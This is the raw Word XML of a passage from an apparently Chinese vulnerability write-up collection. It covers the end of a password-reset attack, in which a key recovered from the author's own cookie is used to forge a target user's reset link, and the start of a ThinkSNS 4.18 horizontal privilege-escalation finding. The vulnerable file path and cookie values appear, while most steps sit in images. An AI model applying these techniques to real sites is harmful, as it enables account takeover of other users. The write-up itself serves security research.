                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="124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 w:line="391" w:lineRule="auto"/>
                      <w:ind w:left="579" w:right="2656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$code = base64_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encode(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$code); return $code;</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr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?&gt;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1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:spacing w:before="35" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia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6736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253538</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4010718" cy="782097"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom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718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int="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>首先申</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>请</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>重置目</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>标</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>户</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>的密</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>码</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="4"/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利用自己的注册用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>户</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:spacing w:val="-59"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">cookie </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>解密</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:spacing w:val="-56"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="12"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho"/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6760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99382</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4019448" cy="674465"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="10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448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80020F">
      <w:pPr>
        <w:spacing w:before="92"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>当前登</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>录</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>户</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:spacing w:val="-58"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">cookie </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>中的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:spacing w:val="-55"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">auth </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="78"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>VjEFWAFbAwtXBlUDV1ZVCAEAUFkDBQFcVFcCUggCAlNVWg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="71"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>%3D%3D</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
          <w:sz w:val="29"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr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然后</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>进</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>行解密：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia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0"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho"/>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="417"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho"/>
          <w:noProof/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4061216" cy="970026"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"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216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80020F">
      <w:pPr>
        <w:spacing w:before="39"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="73" w:name="越权访问"/>
      <w:bookmarkStart w:id="74" w:name="ThinkSNS水平权限问题"/>
      <w:bookmarkStart w:id="75" w:name="_bookmark34"/>
      <w:bookmarkEnd w:id="73"/>
      <w:bookmarkEnd w:id="74"/>
      <w:bookmarkEnd w:id="75"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>获得</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:spacing w:val="-60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key </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:spacing w:val="-60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d82ab802de152bf9bb</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="11"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
          <w:sz w:val="29"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr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6784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228265</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4068985" cy="796671"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="10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985" cy="79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int="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>然后</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>输</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>入想要重置的用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>户</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="417" w:right="317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lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>获得了重置密码的链接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>。</w:t>
      </w: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292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="3"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho"/>
          <w:sz w:val="23"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>越权访问</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="7"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:b/>
          <w:sz w:val="43"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">ThinkSNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>水平</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>权</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>限</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>问题</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:b/>
          <w:sz w:val="27"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:spacing w:line="268" w:lineRule="auto"/>
        <w:ind w:right="403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sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>作者：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">Ano_Tom </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>看</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>之前</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>乌</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>云白帽子</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>发</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>的关于水平</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>权</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>限的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>问题</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，貌似很多。重新看了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下，好多都没修复。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>发</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>个没有重复的。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>测试</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>版本：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>4.18</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:spacing w:val="-51"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>号官网</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>载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版本。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho"/>
          <w:sz w:val="26"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr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漏洞文件：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="95"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>/thinksns/apps/weba/Lib/Action/GroupAction.class.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
          <w:sz w:val="29"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="542" w:lineRule="auto"/>
        <w:ind w:left="417" w:right="1583"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>说明，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">index </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>应该</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:spacing w:val="-59"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">group </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>文件的完善更新版？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MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>代</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:spacing w:line="542" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21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6"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="8"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:pict>
          <v:group id="_x0000_s5200" style="position:absolute;margin-left:80.85pt;margin-top:72.25pt;width:337.25pt;height:572.2pt;z-index:-364144;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" coordorigin="1617,1445" coordsize="6745,11444">
            <v:rect id="_x0000_s5495" style="position:absolute;left:1617;top:1445;width:6745;height:506" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5494" style="position:absolute;left:1797;top:1688;width:361;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5493" style="position:absolute;left:1617;top:1951;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5492" style="position:absolute;left:1797;top:1984;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5491" style="position:absolute;left:1897;top:1984;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5490" style="position:absolute;left:1997;top:1984;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5489" style="position:absolute;left:2097;top:1984;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5488" style="position:absolute;left:2197;top:1984;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5487" style="position:absolute;left:2297;top:1984;width:120;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5486" style="position:absolute;left:2417;top:1984;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5485" style="position:absolute;left:2517;top:1984;width:1200;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5484" style="position:absolute;left:1617;top:2277;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5483" style="position:absolute;left:1797;top:2340;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5482" style="position:absolute;left:1897;top:2340;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5481" style="position:absolute;left:1997;top:2340;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5480" style="position:absolute;left:2097;top:2340;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5479" style="position:absolute;left:2197;top:2340;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5478" style="position:absolute;left:2297;top:2340;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5477" style="position:absolute;left:2417;top:2340;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
